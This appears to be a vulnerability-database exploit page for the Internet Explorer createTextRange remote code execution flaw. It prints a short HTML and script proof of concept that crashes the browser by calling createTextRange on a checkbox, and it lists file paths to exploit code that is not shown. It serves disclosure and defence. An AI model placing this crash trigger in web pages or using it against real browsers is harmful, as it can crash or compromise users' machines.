• info
• discussion
• exploit
• solution
• references

Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability

The following HTML content demonstrates this issue by crashing the browser:

<input type="checkbox" id='c'>
<script><!--
r=document.getElementById("c");
a=r.createTextRange();
--></script>

Exploit code is available.

• /data/vulnerabilities/exploits/IE_exp.c
• /data/vulnerabilities/exploits/ie_checkbox.pm
• /data/vulnerabilities/exploits/ie_exp2.c
• /data/vulnerabilities/exploits/IE_exp.pm